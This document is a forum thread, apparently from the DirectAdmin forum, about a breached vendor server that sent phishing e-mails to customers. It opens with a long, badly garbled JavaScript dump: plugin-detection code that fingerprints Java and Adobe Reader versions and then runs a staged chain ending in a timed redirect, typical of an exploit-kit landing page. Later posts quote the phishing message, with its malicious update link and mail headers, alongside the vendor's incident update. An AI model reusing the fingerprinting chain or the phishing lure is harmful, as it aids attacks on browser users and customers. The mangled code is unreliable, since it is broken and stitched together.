    j = "["archive",c,"code",u],l=["mayscript","true"],r=["scriptable","true"].concat(l),f=!d.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:n.mimeType[0];if(!q[0]&&g.canUseObjectTag()&&g.canTry(0)){q[0]=d.isIE?d.insertHTML("object",["type",f].concat(j),["codebase",t].concat(j).concat(r),h,n):d.insertHTML("object",["type",f,"archive",c,"classid","java:"+u],["codebase",t,"archive",c].concat(r),h,n);o[0]=[0,0];g.queryThis(0)}if(!q[1]&&g.canUseAppletTag()&&g.canTry(1)){q[1]=d.isIE?d.insertHTML("applet",["alt",h].concat(l).concat(j),["codebase",t].concat(l),h,n):d.insertHTML("applet",["codebase",t,"alt",h].concat(l).concat(j),[].concat(l),h,n);o[1]=[0,0];g.queryThis(1)}if(!q[2]&&g.canUseObjectTag()&&g.canTry(2)){q[2]=d.isIE?d.insertHTML("object",["classid",n.classID],["codebase",t].concat(j).concat(r),h,n):d.insertHTML();o[2]=[0,0];g.queryThis(2)}if(!g.DummyObjTagHTML&&g.canUseObjectTag()){g.DummyObjTagHTML=d.insertHTML("object",[],[],h)}if(!g.DummySpanTagHTML){g.DummySpanTagHTML=d.insertHTML("",[],[],h)};var"
    k, a = "0;for(k=0;k<o.length;k++){if(q[k]||g.canTry(k)){a++}else{break}}if(a==o.length){n.getVersionDone=n.forceVerifyTag.length" > 0 ? 0 : 1
}
return g.getResult()
}
},
append: function(e, d) {
    for (var c = 0; c < d.length; c++) {
        e.push(d[c])
    }
},
javafix: function() {}
},
adobereader: {
    mimetype: "application pdf",
    navpluginobj: null,
    progid: ["acropdf.pdf", "pdf.pdfctrl"],
    classid: "clsid:ca8a9780-280d-11cf-a24d-444553540000",
    installed: {},
    pluginhasmimetype: function(d, c, f) {
        var = ""
        b = "this,e=b.$,a;for(a" in = ""
        d) {
        if (d[a] && d[a].type && d[a].type = "=c){return"
        1
        }
    }
    if (e.getmimeenabledplugin(c, f)) {
        return = ""
        1
    }
    return = ""
    0
},
getversion: function(i, j) {
    var = ""
    f = "this,c=f.$,h,d,k,m=p=null,g=null,l=null,a,b;j=(c.isString(j)&&j.length)?j.replace(/\s/,"").toLowerCase():f.mimeType;if(c.isDefined(f.INSTALLED[j])){f.installed=f.INSTALLED[j];return}if(!c.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(f.getVersionDone!==0){f.getVersionDone=0;p=c.getMimeEnabledPlugin(f.mimeType,a);if(!p&&c.hasMimeType(f.mimeType)){p=c.findNavPlugin(a,0)}if(p){f.navPluginObj=p;g=c.getNum(p.description)||c.getNum(p.name);g=c.getPluginFileVersion(p,g);if(!g&&c.OS==1){if(f.pluginHasMimeType(p,"application/vnd.adobe.pdfxml",a)){g="9"}else{if(f.pluginHasMimeType(p,"application/vnd.adobe.x-mars",a)){g="8"}}}}}else{g=f.version}m=c.getMimeEnabledPlugin(j,a);f.installed=m&&g?1:(m?0:(f.navPluginObj?-0.2:-1))}else{p=c.getAXO(f.progID[0])||c.getAXO(f.progID[1]);b=/=\s*([\d\.]+)/g;try{d=(p||c.getDOMobj(c.insertHTML("object",["classid",f.classID],["src",""],"",f))).GetVersions();for(k=0;k<5;k++){if(b.test(d)&&(!g||RegExp.$1" > g)) {
    g = RegExp.$1
}
}
} catch (h) {}
f.installed = g ? 1 : (p ? 0 : -1)
}
if (!f.version) {
    f.version = c.formatNum(g)
}
f.INSTALLED[j] = f.installed
}
},
zz: 0
};PluginDetect.initScript();PluginDetect.getVersion(".");jver = PluginDetect.getVersion("Java", javafile);pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e) {}
// Normalise the two detection results into arrays.
// getVersion() yields a version string when the plugin was found. The
// getVersion(".") call inside the try block apparently switches the delimiter
// to ".", which is why the split is on "." here. Anything that is not a string
// (null, or the untouched default if the try block threw) is reset to the
// "not detected" tuple.
// Note the asymmetry: after split() the elements are strings, while the
// fallback tuple holds numbers.
if (typeof jver == 'string') {
    jver = jver.split('.')
} else {
    jver = [0, 0, 0, 0]
}
if (typeof pdfver == 'string') {
    pdfver = pdfver.split('.')
} else {
    pdfver = [0, 0, 0, 0]
}
/*
 * Stage chain spl0 -> spl1 -> ... -> spl6.
 *
 * In this tidied copy every stage only hands control to the next one, and the
 * final stage schedules end_redirect() after 6000 ms. end_redirect is declared
 * with an empty body at the top of the listing, so the chain as captured has
 * no visible effect and never reads jver or pdfver.
 * NOTE(review): presumably the stages were filled in differently when the page
 * was actually served; that cannot be confirmed from this listing, so the
 * empty stubs say nothing about what other captures of the page contained.
 */
function spl0() { spl1(); }
function spl1() { spl2(); }
function spl2() { spl3(); }
function spl3() { spl4(); }
function spl4() { spl5(); }
function spl5() { spl6(); }

// Last stage: defer the (empty) end_redirect callback by six seconds.
function spl6() { setTimeout(end_redirect, 6000); }
spl0() < /d.length;c++){e.push(d[c])}},javafix:function(){}},adobereader:{mimetype:"application></c.length;a++) {
    b = c[a];
    if (b[0]) {
        break
    }
}
return [].concat(b)
},
cantry: function(d) {
    var > < /len;a++){b=h.getnum(d.get(len-1-a).version);if(b){f.jreall[a]=b}}}}}catch(i){}}if(f.jreall.length></b.allowed.length;
    k++) {
    if (e.isnum(l[k])) {
        b.allowed[k] = l[k]
    }
}
}
for (k = 0; k < c.forceverifytag.length; k++) {
    b.allowed[k] = c.forceverifytag[k]
}
if (e.isstring(d)) {
    c.jar.push(d)
}
if (c.getversiondone == 0) {
    if (!c.version || b.cantryany()) {
        f = b.inserthtmlqueryall(d);
        if (f[0]) {
            c.installed = 1;
            c.endgetversion(f[0], f[1])
        }
    }
    return
}
var > < /navigator.mimetypes.length;h++){j=navigator.mimetypes[h];if(c.test(j.type)&&(e=j.enabledplugin)&&(j=regexp.$2)&&(k.test(e.description||f)||k.test(e.name||f))){i["a"+d.formatnum(j)]=j}}b="0,0,0,0";for(h></this.javaversions.length;n++) {
    f = this.javaversions[n];
    q = "javaplugin." + f[0] + "" + f[1];
    g = f[0] + "." + f[1] + ".";
    for (a = f[2]; a > < /b.length;n=n+2){if(></g.length; a = a + 2) {
        try {
            f[g[a]] = g[a + 1]
        } catch (d) {}
    }
}
},
insertdivinbody: function(i) {
    var > < /c.donefuncs.length;a++){c.callarray(c.donefuncs)}c.emptydiv()},getwidth:function(c){if(c){var></b.length;
    a++) {
    if (b[a] === null) {
        return
    }
    c.call(b[a]);
    b[a] = null
}
}
},
call: function(c) {
    var > < /j.length;f++){if(c.getaxo(j[f])){c.activexenabled=true;break}}c.head=c.isdefined(document.getelementsbytagname)?document.getelementsbytagname("head")[0]:null}c.isgecko=(></d.length;
    a++) {
    if (c > < /f.length;e++){if(></g (b[a], 10)) {
        return > < /math.min(c.length,b.length);a++){if(g(c[a],10)></body > < /html>
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:

  • Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
  • Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
  • Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
  • Finally, don't click that link. It's a malicious program but it can be cleaned with Trend Micro HouseCall, Malwarebytes' Anti-Malware, etc.
Will keep you updated..

Mark
 
I've only had the one email but have around 40 licenses - presuming all that data is now in the hands of the bad boys :-(
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:

  • Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
  • Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
  • Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
  • Finally, don't click that link. It's a malicious program but it can be cleaned with Trend Micro HouseCall, Malwarebytes' Anti-Malware, etc.
Will keep you updated..

Mark

Thanks for the update (and honesty) Mark. Just a quick one... now that the license details are known, are we all likely to have reissued licenses?
 
Same thing here:
Dear XXXXXXX,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.xxxcom.au/update.php


Thank you,
DirectAdmin.com

I don't give out my middle initial to anybody except a couple entities... and DA is one of them.

Bad news!
 
One more here in case you need it.

Dear Eugene Stover,

Please note that currently there is a security vulnerability concerning the current DirectAdmin version, in order to learn how to protect your server until we can issue a patch please visit http://www.austinfosec.com.au/update.php


Thank you,
DirectAdmin.com

Header:


Received: from jbmc-software.com (216.194.67.119) by my.server.com
(10.0.10.2) with Microsoft SMTP Server (TLS) id 8.1.240.5; Wed, 25 May 2011
16:58:54 -0400
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>) id 1QPLBR-0001w9-37 for
[email protected]; Wed, 25 May 2011 15:00:01 -0600
To: <[email protected]>
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-ID: <[email protected]>
Date: Wed, 25 May 2011 15:00:01 -0600
MIME-Version: 1.0
Content-Type: text/plain
Return-Path: [email protected]
X-MS-Exchange-Organization-PRD: directadmin.com
X-MS-Exchange-Organization-SenderIdResult: Pass
Received-SPF: Pass (SERVER-001.127-001.local: domain of
[email protected] designates 216.194.67.119 as permitted sender)
receiver=SERVER-001.127-001.local; client-ip=216.194.67.119;
helo=jbmc-software.com;
X-MS-Exchange-Organization-SCL: 5
X-MS-Exchange-Organization-PCL: 2
X-MS-Exchange-Organization-Antispam-Report: DV:3.3.10124.509;SV:3.3.9010.377;SID:SenderIDStatus
Pass;OrigIP:216.194.67.119
 
Same thing here:
Dear XXXXXXX,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.xxxcom.au/update.php


Thank you,
DirectAdmin.com

I don't give out my middle initial to anybody except a couple entities... and DA is one of them.

Bad news!
check http://directadmin.com/forum/showpost.php?p=204051&postcount=45
 
clearly the user account database was hacked. i'd like assurances that all passwords are reset and i want clear and concise communication as to exactly what happened.
 